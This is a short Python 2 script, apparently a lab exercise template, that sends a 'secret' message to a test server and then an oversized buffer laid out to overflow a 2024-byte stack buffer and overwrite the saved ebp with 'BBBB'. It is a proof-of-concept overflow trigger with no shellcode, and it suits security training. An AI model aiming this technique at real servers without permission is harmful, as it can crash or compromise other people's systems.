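#!/usr/bin/python
"""Two-message overflow check against a test server.

Usage: template.py IP PORT

The first message ("secret") moves the server into its second recv();
the second is an oversized buffer whose layout follows the author's notes
on the server's stack frame (acReadBuffer, then nReadBytes/nSentBytes/nTemp,
then the saved ebp).  The script only reports what was sent and what came
back.  Python 2: payloads are str, not bytes.
"""
import socket, sys, struct  # struct is unused but kept from the original

# Sizes from the author's comments on the target's stack layout.
READ_BUFFER_SIZE = 2024  # acReadBuffer
LOCALS_SIZE = 12         # nReadBytes, nSentBytes, nTemp
SAVED_EBP_SIZE = 4       # saved ebp slot

if len(sys.argv) != 3:
    print("template.py IP PORT")
    sys.exit(-1)

# A non-numeric PORT previously died with an int() traceback; fail with usage instead.
try:
    port = int(sys.argv[2])
except ValueError:
    print("template.py IP PORT")
    sys.exit(-1)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((sys.argv[1], port))
try:
    # The first payload to get us into the second recv()
    payload = "secret\n\x00"
    sock.sendall(payload)
    data = sock.recv(1024)
    print("Sent 'secret' to server, got {0}".format(data))

    # The second payload to take advantage of the overflow
    payload = "A" * READ_BUFFER_SIZE   # Fill the new acReadBuffer
    payload += "A" * LOCALS_SIZE       # Fill nReadBytes, nSentBytes, nTemp
    payload += "B" * SAVED_EBP_SIZE    # Overwrite push ebp
    sock.sendall(payload)
    print("Sent {0} to server".format(payload))
    data = sock.recv(1024)
finally:
    # The original never closed the socket; release it even if recv() raises.
    sock.close()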